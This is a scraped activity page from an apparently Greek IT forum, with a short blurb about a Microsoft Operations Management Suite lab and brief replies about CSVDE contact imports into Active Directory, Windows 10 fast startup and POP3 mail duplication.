    This lab will show you how to get started with Microsoft Operations Management Suite so that you can protect your heterogeneous environments, respond proactively to changing business needs and simplify IT management – all from a single portal with no infrastructure to maintain. The lab will also show you how Microsoft Operations Management Suite delivers immediate, actionable insights into your log data by providing a cost-effective, all-in-one cloud management solution so you can better protect guest workloads in Azure, AWS, Windows Server, Linux, VMWare, and Open Stack.
     
     
     

  23. Like
    Blackman reacted to MichalisCorsa in Εισαγωγή πολλαπλών επαφών σε ένα OU στο Active Directory με CSVDE?   
    Αν το CSV αρχείο είναι όπως στην εικόνα το μόνο πρόβλημα που βλέπω είναι τα quotes στο πεδίο του distinguished name (DN).

    Θα έπρεπε να είναι όπως παρακάτω:

    objectclass,DN,givenname,sn,mail
    contact,"CN=Bob Dylan,OU=Mail Contacts,DC=Contoso,DC=local",Bob,Dylan,[email protected]

    Αλλιώς βλέπει το κάθε κόμμα σαν καινούργιο πεδίο.

    Το CSVDE το τρέχεις επάνω στον domain controller; Στο output που έχεις βάλει δεν βλέπω να έχεις ορίσει server που θα συνδεθει για να κάνει το import.
  24. Like
    Blackman got a reaction from tsgas in Windows 10 hybrid shutdown???   
    Έτσι έκλεισε...
    απενεργοποιόντας το fast startup
     

  25. Like
    Blackman reacted to fumantsu in Ένα workstation, διαφορετικοί domain users, πρόσβαση σε POP3 account   
    Προσοχή. Δε θα πρέπει να κρατάς αντίγραφο στον server τα e-mail. Γιατί για κάθε προφίλ θα στα ξανακατεβάζει από τον server και θα έχεις το ίδιο e-mail 4 φορές.
×
×
  • Create New...